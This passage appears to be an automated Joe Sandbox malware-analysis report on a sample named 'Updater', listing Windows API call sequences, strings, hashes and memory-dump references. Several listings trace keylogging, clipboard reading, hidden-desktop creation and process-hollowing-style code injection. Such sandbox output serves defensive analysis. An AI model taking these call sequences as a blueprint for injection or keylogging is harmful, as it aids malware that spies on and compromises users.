                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0074F6EC
                                                                                                  • CloseClipboard.USER32 ref: 0074F6F6
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0074F721
                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0074F72E
                                                                                                  • GetClipboardData.USER32(00000001), ref: 0074F736
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0074F747
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0074F787
                                                                                                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 0074F79D
                                                                                                  • GetClipboardData.USER32(0000000F), ref: 0074F7A9
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0074F7BA
                                                                                                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0074F7DC
                                                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0074F7F9
                                                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0074F837
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0074F858
                                                                                                  • CountClipboardFormats.USER32 ref: 0074F879
                                                                                                  • CloseClipboard.USER32 ref: 0074F8C2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 420908878-0
                                                                                                  • Opcode ID: de681eb69b05df11f737aa839dbe39b6e75b82561180a0b5f6e27d88a580c49e
                                                                                                  • Instruction ID: ec94b9af055d988902c407eea4f3a782a9f43b4028f74cb5c5545ba342fad84f
                                                                                                  • Opcode Fuzzy Hash: de681eb69b05df11f737aa839dbe39b6e75b82561180a0b5f6e27d88a580c49e
                                                                                                  • Instruction Fuzzy Hash: C161E2356043419FD320EF24D898F2A77A8EF44744F45842DF8578B2A2CB79EE45CB66
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $!$"$'$+$0$9$:$<$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$]${
                                                                                                  • API String ID: 0-2815329305
                                                                                                  • Opcode ID: 860d9e7d99053ab5b0f9b4b54acce17a7dcde4efa3f89d19b7add5ef53170963
                                                                                                  • Instruction ID: 9ea481796f25b81601c61210f81ac5300c63d680ea055607657744c317e6a358
                                                                                                  • Opcode Fuzzy Hash: 860d9e7d99053ab5b0f9b4b54acce17a7dcde4efa3f89d19b7add5ef53170963
                                                                                                  • Instruction Fuzzy Hash: 03A3A075E00229DFDB24CF58D881AADB7B1FF58710F25816AE945EB381E7789E81CB40
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 014A181A
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 014A182B
                                                                                                  • lstrcpyn.KERNEL32(?,?,?,?,?,kernel32.dll), ref: 014A185F
                                                                                                  • lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 014A18D0
                                                                                                  • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll), ref: 014A190B
                                                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll), ref: 014A191E
                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 014A192B
                                                                                                  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 014A1937
                                                                                                  • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 014A196B
                                                                                                  • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 014A1977
                                                                                                  • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 014A19A0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                  • API String ID: 3245196872-1565342463
                                                                                                  • Opcode ID: 496b4e9fb2eb3bc482d289fef6ce8af0b5713fc394ebb54f55ee8745dfb9fe98
                                                                                                  • Instruction ID: 7520b75cb96a7e0270e10de9da964251d86ce393b6feb070eb47931511b522db
                                                                                                  • Opcode Fuzzy Hash: 496b4e9fb2eb3bc482d289fef6ce8af0b5713fc394ebb54f55ee8745dfb9fe98
                                                                                                  • Instruction Fuzzy Hash: D7515AB1E00259EFEB01DFE9CC84AEEBBBCAF64300F5505ABA554E7260D7349A44CB50
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0074A1A8
                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0074A1E6
                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 0074A200
                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0074A218
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0074A223
                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0074A23F
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0074A28F
                                                                                                  • SetCurrentDirectoryW.KERNEL32(007979A0), ref: 0074A2AD
                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0074A2B7
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0074A2C4
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0074A2D6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                  • String ID: *.*
                                                                                                  • API String ID: 1409584000-438819550
                                                                                                  • Opcode ID: 37fe8860048e5d4353cadfcfd71e60a83ab8077cf5f102b458d8da4cef50a669
                                                                                                  • Instruction ID: 5128f99db93bb82a595a7e72bde92ccd3a11479511adf50de3e76cce607fc457
                                                                                                  • Opcode Fuzzy Hash: 37fe8860048e5d4353cadfcfd71e60a83ab8077cf5f102b458d8da4cef50a669
                                                                                                  • Instruction Fuzzy Hash: DE310332A4121D7EDF249FA4DC48AEE73ACFF49320F000155E915E2190EBB9EE449A69
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$x
                                                                                                  • API String ID: 0-3146507942
                                                                                                  • Opcode ID: bee785910772ae841e93bc0ea07327f336792146bb7e713a970b244ef41f4b86
                                                                                                  • Instruction ID: 94e6a3cfa957d3d09ee12dbe810fccf7b3bd5d599b83ee16349cac02e6feece3
                                                                                                  • Opcode Fuzzy Hash: bee785910772ae841e93bc0ea07327f336792146bb7e713a970b244ef41f4b86
                                                                                                  • Instruction Fuzzy Hash: B4728271E00369DBDB14CF59D8417AEB7B6FF44310F14816AE909EB281EB789E81CB91
                                                                                                  APIs
                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00748D1A
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00748D2A
                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00748D36
                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00748DD3
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00748DE7
                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00748DF2
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00748E20
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00748E56
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00748E5F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentDirectoryTime$File$Local$AttributesSystem
                                                                                                  • String ID: *.*
                                                                                                  • API String ID: 2554310696-438819550
                                                                                                  • Opcode ID: 9209592082ea1a31af6fdbd23cd01e7be8651ee236695e524927d6f3c72a27d1
                                                                                                  • Instruction ID: 1a51883c14f86d97130246eb73680129870bd17b0764d155106a7b786c11599b
                                                                                                  • Opcode Fuzzy Hash: 9209592082ea1a31af6fdbd23cd01e7be8651ee236695e524927d6f3c72a27d1
                                                                                                  • Instruction Fuzzy Hash: 90617B71A04319AFC750EF24C8849AEB3E9FF88310F04891EF99983251DB39EA45CB56
                                                                                                  APIs
                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,014B9297), ref: 014B90B9
                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 014B9186
                                                                                                  • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 014B919E
                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 014B91C6
                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00001000,?,?,?,?,00000004,?,00000000,00000000,00000000,00000000,00000000,00000004), ref: 014B91F5
                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 014B9247
                                                                                                  • ResumeThread.KERNEL32(?,?,?,00000000,00000000,?), ref: 014B9250
                                                                                                  • Sleep.KERNEL32(000001F4,?,?,?,00000000,00000000,?), ref: 014B925A
                                                                                                  • GetTickCount.KERNEL32 ref: 014B925F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$Memory$Read$CountCreateCurrentInformationQueryResumeSleepThreadTickWrite
                                                                                                  • String ID: D
                                                                                                  • API String ID: 4190092080-2746444292
                                                                                                  • Opcode ID: b531c5f182683272547d8f31d51ba4c2015977fb88a374802bcd5e434c887b7e
                                                                                                  • Instruction ID: 2490aa8e639a5b4ddff1e691e7172e9e7e32d0c4ba323a399b34d065eb876841
                                                                                                  • Opcode Fuzzy Hash: b531c5f182683272547d8f31d51ba4c2015977fb88a374802bcd5e434c887b7e
                                                                                                  • Instruction Fuzzy Hash: 6D61EC75E0010D9FDB10EBA9DC91EDEB7BCAF28310F95406AF248E7250D774AA858B60
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0074A305
                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0074A360
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0074A36B
                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0074A387
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0074A3D7
                                                                                                  • SetCurrentDirectoryW.KERNEL32(007979A0), ref: 0074A3F5
                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0074A3FF
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0074A40C
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0074A41E
                                                                                                    • Part of subcall function 0073E8E1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0073E8FC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                  • String ID: *.*
                                                                                                  • API String ID: 2640511053-438819550
                                                                                                  • Opcode ID: 01a657c70d0f56504a83cc5d8c1e2de864d2becc4d908085ab4373e7c78849d0
                                                                                                  • Instruction ID: 7c81a141290f8cbff3105c22a48fea48f9d428ba00fe134424ebbc9fa1e0d043
                                                                                                  • Opcode Fuzzy Hash: 01a657c70d0f56504a83cc5d8c1e2de864d2becc4d908085ab4373e7c78849d0
                                                                                                  • Instruction Fuzzy Hash: DC31077164035DBACF24AFA8EC48ADE776CEF05320F140165F915A3190E778EE858A59
                                                                                                  APIs
                                                                                                    • Part of subcall function 0075D398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0075C0AE,?,?), ref: 0075D3B5
                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075C93E
                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0075C9A9
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0075C9CD
                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0075CA2C
                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0075CAE7
                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0075CB54
                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0075CBE9
                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0075CC3A
                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0075CCE3
                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0075CD82
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0075CD8F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                                                  • String ID:
                                                                                                  • API String ID: 3218304859-0
                                                                                                  • Opcode ID: 8f4ccb507b54819ec57c4c9bd202c386a270015e2c84a83bf8cdb1a95edc2ef1
                                                                                                  • Instruction ID: 87e07684cc93852fb0699c2ad5b4c1379f9028221b254e8382b8f1f4fe003f3a
                                                                                                  • Opcode Fuzzy Hash: 8f4ccb507b54819ec57c4c9bd202c386a270015e2c84a83bf8cdb1a95edc2ef1
                                                                                                  • Instruction Fuzzy Hash: AA026A71604300AFD715CF28C895F6ABBE5AF49304F0884ADF84ACB2A2DB75ED46CB51
                                                                                                  APIs
                                                                                                  • GetKeyboardState.USER32(?), ref: 0073AABD
                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 0073AB3E
                                                                                                  • GetKeyState.USER32(000000A0), ref: 0073AB59
                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 0073AB73
                                                                                                  • GetKeyState.USER32(000000A1), ref: 0073AB88
                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 0073ABA0
                                                                                                  • GetKeyState.USER32(00000011), ref: 0073ABB2
                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0073ABCA
                                                                                                  • GetKeyState.USER32(00000012), ref: 0073ABDC
                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 0073ABF4
                                                                                                  • GetKeyState.USER32(0000005B), ref: 0073AC06
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: State$Async$Keyboard
                                                                                                  • String ID:
                                                                                                  • API String ID: 541375521-0
                                                                                                  • Opcode ID: 52f8a43cfdd59fd24b11383846b5f2a9822a6e3d5afe23b15cfe57fc7c8baf39
                                                                                                  • Instruction ID: d095f983f3d722d8c979719526491d57191fe7864139c7b078b82dca717b707d
                                                                                                  • Opcode Fuzzy Hash: 52f8a43cfdd59fd24b11383846b5f2a9822a6e3d5afe23b15cfe57fc7c8baf39
                                                                                                  • Instruction Fuzzy Hash: 6D41B360A047CA7EFF358B6489067A5FAA1AB11304F08805AD5C7465C3EBEC9DD4CB63
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 007475BD
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0074760E
                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0074763A
                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00747651
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00747678
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileTime$FindLocal$CloseFirstSystem_wcslen
                                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                  • API String ID: 409396820-2428617273
                                                                                                  • Opcode ID: e156f384a120867f9ab721cf266c3539458f25f9f69fe3bf83c2cd076642fad9
                                                                                                  • Instruction ID: 415251dc43e8d4e0c2860ca1d4a482db84cd12ef419dd04ea602b2793c06a5ef
                                                                                                  • Opcode Fuzzy Hash: e156f384a120867f9ab721cf266c3539458f25f9f69fe3bf83c2cd076642fad9
                                                                                                  • Instruction Fuzzy Hash: 0EA16E71918244AFC354EFA4C895DAFB7EDEF94300F04491EF58686292EB34DA09CB66
                                                                                                  APIs
                                                                                                  • CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 014B5C93
                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,014B5DC2), ref: 014B5CD4
                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 014B5D11
                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,014B5DC2), ref: 014B5D4A
                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 014B5D82
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,014B5DC2), ref: 014B5D95
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create$Process$DesktopObjectSingleWait
                                                                                                  • String ID: D
                                                                                                  • API String ID: 183768610-2746444292
                                                                                                  • Opcode ID: 9e392d9a1e87e2db28d579fed074bdf6472a89a175c1a6494f57214e66a76e0c
                                                                                                  • Instruction ID: c0f433a665078c9eb32412aa0ee99959c8836b30a3d0dbf02d6175cc2633430e
                                                                                                  • Opcode Fuzzy Hash: 9e392d9a1e87e2db28d579fed074bdf6472a89a175c1a6494f57214e66a76e0c
                                                                                                  • Instruction Fuzzy Hash: 1251F074A4030EAFEB10DB95CC85FDEB7BCEF28710F61426AB514AB2A0D774A9058B54
                                                                                                  APIs
                                                                                                    • Part of subcall function 006D119F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006D1192,?), ref: 006D11BF
                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0073E1C0
                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0073E1FD
                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 0073E24D
                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0073E25E
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0073E275
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0073E27E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                  • String ID: \*.*
                                                                                                  • API String ID: 2649000838-1173974218
                                                                                                  • Opcode ID: d922c6de31484f4f317305496ed0475c8bd4735324b3e19a5823a0ed99622ade
                                                                                                  • Instruction ID: 2daadb28e41db6ce0a983f2a9b1222eba5ef4795da546a041fc63d0768ab94dd
                                                                                                  • Opcode Fuzzy Hash: d922c6de31484f4f317305496ed0475c8bd4735324b3e19a5823a0ed99622ade
                                                                                                  • Instruction Fuzzy Hash: E0319231418345AFD704EF64D8959AFB7A9BE55300F404E2EF8E6821E2EB24DE09C756
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
